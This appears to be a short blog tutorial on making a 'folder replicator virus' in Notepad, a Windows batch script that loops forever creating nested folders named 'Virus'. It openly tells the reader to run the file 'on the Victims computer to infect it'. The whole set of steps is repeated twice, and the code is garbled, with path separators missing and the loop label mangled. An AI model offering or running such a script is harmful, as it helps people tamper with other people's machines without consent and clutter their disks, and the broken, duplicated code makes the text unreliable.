create folder replicator virus using notepad
Folder replication is the process of creating the same folder infinte
times.That is multiplying a folder many times so that it will keep on
replicating itself.Here we are creating a simple batch virus to
replicate a folder with your own name multiple times.The trick is so
simple all you have to need is notpad to create this virus.Just follow
the steps given below to create this virus.
STEPS FOR CREATING FOLDER REPLICATOR
1. Just open up a notepad, copy and paste the below code
cd
cd C-Documents and SettingsusernameDesktop
-loop
md Virus
cd Virus
goto loop
2. Save it as a batch file with the extension .bat.
3. Then run it on the Victims computer to infect it.
4. Any how it doesnt cause much harm, but replicates folder inside a folder and goes on.
NOTE - C-Documents and SettingsusernameDesktop Is the path where the folder is created and Virus in the above code is the name of the folder, you can change both to custom path and name.its all upon you..
STEPS FOR CREATING FOLDER REPLICATOR
1. Just open up a notepad, copy and paste the below code
cd
cd C-Documents and SettingsusernameDesktop
-loop
md Virus
cd Virus
goto loop
2. Save it as a batch file with the extension .bat.
3. Then run it on the Victims computer to infect it.
4. Any how it doesnt cause much harm, but replicates folder inside a folder and goes on.
NOTE - C-Documents and SettingsusernameDesktop Is the path where the folder is created and Virus in the above code is the name of the folder, you can change both to custom path and name.its all upon you..
Comments
Post a Comment